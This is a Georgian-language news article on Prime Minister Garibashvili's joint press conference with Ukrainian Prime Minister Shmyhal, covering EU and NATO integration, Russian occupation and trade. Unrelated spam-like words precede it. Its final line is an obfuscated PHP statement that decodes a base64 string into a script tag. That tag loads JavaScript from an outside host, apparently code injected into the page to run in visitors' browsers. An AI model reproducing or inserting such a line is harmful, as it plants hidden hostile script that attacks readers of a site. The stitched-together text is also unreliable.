celsiusi
ავერსი შნაიდერი
უკრაინა-საქართველოს აქვს ძალიან ბევრი გამოწვევა, ძალიან ბევრი საერთო ინტერესი, ჩვენ საერთო გამოწვევებიც და პრობლემები გაგვაჩნია, როგორიც არის რუსეთის მხრიდან მომდინარე საფრთხეები და ოკუპაციის მძიმე შედეგები, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა უკრაინელ კოლეგასთან დენის შმიგალთან გამართული შეხვედრის შემდეგ ერთობლივ პრესკონფერენციაზე განაცხადა.
 
მისივე თქმით, შეხვედრის მთავარი საკითხი იყო ორი ქვეყნის სწრაფვა ევროკავშირისა და ნატოსკენ.
 
„მე მოხარული ვარ, რომ იგი დღეს სტუმრობს ჩვენს ქვეყანას. მოგეხსენებათ, ჩვენს ქვეყნებს აქვს ძალიან მჭიდრო ურთიერთობა და თანამშრომლობა. ჩვენს ხალხებს შორის არსებობს ძალიან თბილი მეგობრული ურთიერთობა და ამას ადასტურებს ჩვენი დღვანდელი ვიზიტიც. უკრაინა- საქაართველოს აქვს ძალიან ბევრი გამოწვევა, ძალიან ბევრი საერთო ინტერესი და ჩვენ დღეს განვიხილეთ არაერთი საკითხი, რომელიც ეხება არამხოლოდ ორმხრივ, არამედ მრავალმხრივ ურთიერთობებს. რა თქმა უნდა, ჩვენ საერთო გამოწვევებიც და პრობლემების გაგვაჩნია, როგორიც არის რუსეთის მხრიდან მომდინარე საფრთხეები და ოკუპაციიის მძიმე შედეგები. ჩემს კოლეგასთან, რა თქმა უნდა, მე გამოვხატე ჩვენი ღრმა შეშფოთება უკრაინის საზღვრებთან და დროებით ოკუპირებულ ყირიმში რუსეთის სამხედრო გააქტიურების გამო. მე მას დავუდასტურე ჩვენი მტკიცე მხარდაჭერა უკრაინის სუვერენიტეტისა და ტერიტორიული მთლიანობისადმი. ჩვენი შეხვედრის მთავარი საკითხი იყო ჩვენი სწრაფვა ევროკავშირისკენ, რა თქმა უნდა, ორივე ქვეყანა არის მკაფიოდ ჩამოყალიბებული, რომ გახდეს ევროკავშირის წევრი ქვეყანა და ჩვენ ამ საკითხზე ბუნებრივია, ბევრი ვისაუბრეთ. მოგეხსენებათ, რომ 17 მაისს, საქართველომ, უკრაინამ და მოლდოვამ ხელი მოაწერა მემორანდუმს „ასოცირებული ტრიოს“ დაფუძნების შესახებ, რაც ძალიან მნიშვნელოვანი პოლიტიკური განაცხადია. ჩვენ ასევე განვიხილეთ საქართველოსა და უკრაინის ნატო-ში ინტეგრაციის საკითხი, ორივე ქვეყანა ასევე ვართ ძალიან მოტივირებული, რომ მალე გავხდეთ ნატო-ს სრულფასოვანი წევრები. მოგეხსენებათ, რომ ბუქარესტის სამიტზე მოკავშირეებმა მიიღეს გადაწყვეტილება - საქართველო და უკრაინა გახდებიან ნატო-ს წევრები და წლების განმავლობაში ჩვენმა ქვეყნებმა ამ გზაზე მნიშვნელოვან პროგრესს მიაღწიეს. ჩვენ, რა თქმა უნდა, განვიხილეთ სავაჭრო -ეკონომიკური საკითხები. ჩვენ შევთანხმდით, რომ აუცილებელია ამ მიმართულებით გააქტიურება. უკრაინა არის საქართველოს ერთ-ერთი მთავარი სავაჭრო პარტნიორი, რომელიც ტოპ ათეულში შედის და ჩვენი ამოცანაა, რომელიც ჩემს კოლეგასთან ერთად დავისახეთ, რომ გავაორმაგოთ სავაჭრო ბრუნვა ჩვენს ქვეყნებს შორის. ასევე აღვნიშნეთ, რომ აუცილებელია გააქტიურება ტრანსპორტის, ლოგისტიკის მიმართულებით, სხვადასხვა პროექტის მიმართულებით. მინდა ასევე აღვნიშნოთ, რომ ტურიზმი არის ძალიან მნიშვნელოვანი ჩვენი ქვეყნისთვის. ძალიან ბევრი ტურისტი გვყავს უკრაინიდან და მოხარული ვიქნებით კიდევ მეტი უკრაინელი ტურისტის მიღებით საქართველოში. ასე რომ, კიდევ ერთხელ, მინდა დღევანდელი შეხვედრა შევაჯამო - ჩვენ გვაქვს აბოსლუტურად ყველა მექანიზმი, ძალიან ძლიერი ფუნდამენტი იმისთვის, რომ კიდევ უფრო მეტად გავაძლიეროთ ჩვენს შორის არსებული ისედაც ძალიან ძლიერი ურთიერთობები და კიდევ უფრო მეტად გავაძლიეროთ ჩვენი ორმხრივი თანამშრომლობა და პარტნიორობა. მადლობას ვეტყვი ჩემს კოლეგას, მეგობარს ჩამობრძანებისთვის“, - განაცხადა ღარიბაშვილმა.
1224
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");